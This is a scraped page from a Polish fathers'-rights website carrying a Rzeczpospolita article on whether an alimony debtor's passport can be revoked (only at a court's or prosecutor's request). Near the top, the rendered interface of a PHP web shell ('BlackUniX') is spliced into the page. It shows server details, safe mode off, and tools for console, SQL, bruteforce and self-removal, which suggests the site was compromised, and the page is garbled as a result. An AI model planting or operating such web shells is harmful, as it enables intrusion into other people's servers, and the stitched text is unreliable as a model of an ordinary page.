W Stronę Ojca i no co ty Tato

Polecamy

Powoli paczkomaty zaczynają się przyjmować w Polsce.

BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-07-23 11:27:46
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.198.104.202
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Paszport a alimenty
25.11.2007.
Nie można żądać pozbawienia paszportu tylko dlatego, że zobowiązany do płacenia alimentów zamierza na dłużej lub na stałe wyjechać za granicę. O tym, kiedy można obywatela pozbawić dokumentu uprawniającego do przekroczenia granicy albo odmówić wydania go,

decyduje ustawa z 13 lipca 2006 r. o dokumentach paszportowych (DzU z 2006 r. nr 143, poz. 1027). Takim dokumentem, oprócz paszportu, jest paszport tymczasowy, paszport dyplomatyczny, paszport służbowy MSW.
Nie wystarczy obawa

Czytelniczka otrzymuje alimenty od byłego partnera na dwoje ich wspólnych dzieci. Dowiedziała się, że razem z aktualną żoną zamierza on na stałe wyjechać za granicę. Obawia się, że przestanie łożyć na dzieci. Pyta, czy może wystąpić o odebranie mu paszportu lub w inny sposób zapobiec wyjazdowi.

Nie jest możliwe, aby na wniosek matki dziecka, której ojciec dziecka ma płacić alimenty, czy byłej żony, której sąd przyznał alimenty od męża, pozbawić go paszportu. Unieważnić paszport lub odmówić jego wydania może organ paszportowy, którym u nas jest wojewoda. Robi to na wniosek sądu, prowadzącego przeciwko osobie ubiegającej się o dokument paszportowy lub dysponującej już tym dokumentem postępowanie w sprawie karnej, w sprawie o przestępstwo skarbowe lub postępowanie cywilne – tak mówi art. 17 ust. 1 w związku z art. 38 ust. 1 pkt 1 ustawy z 2006 r.

Sąd może wystąpić z takim wnioskiem wówczas, gdy toczy się przed nim sprawa karna o uchylanie się od alimentów; do sądu wpłynął pozew o alimenty, np. matki dziecka; toczy się sprawa rozwodowa lub o ustalenie ojcostwa, w której sąd musi zadecydować także o obowiązku alimentacyjnym. Sąd nie ma takiej możliwości, jeśli nie prowadzi żadnego postępowania i nie ma podstaw do jego wszczęcia.

Inicjatywa sądu zapobiega wyjazdowi z kraju, jeśli miałby uniemożliwić lub utrudnić na przyszłość egzekwowanie alimentów. A w sprawie karnej o uchylanie się od alimentów jest wręcz środkiem zabezpieczającym przed uchyleniem się od kary. Sąd w sprawie cywilnej może oczywiście zwrócić się do wojewody z własnej inicjatywy albo na wniosek strony – osoby dochodzącej alimentów.

Odmowa lub unieważnienie

Wojewoda jest zobligowany unieważnić paszport albo odmówić jego wydania także: na wniosek organu (prokuratora) prowadzącego postępowanie przygotowawcze (śledztwo lub dochodzenie) w sprawie karnej albo w sprawie o przestępstwo skarbowe; na wniosek organu odpowiedzialnego za wyegzekwowanie kary, np. sądu penitencjarnego, sądowego kuratora zawodowego, dyrektora zakładu karnego.

Jeśli taki wniosek zgłosi matka dziecka, wojewoda musi go odrzucić. Ale gdy wystąpi z nim sąd albo prokurator, wojewoda musi podjąć stosowne kroki.
Źródło : Rzeczpospolita
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:

Odwiedza nas 1 gość
23.07.2018.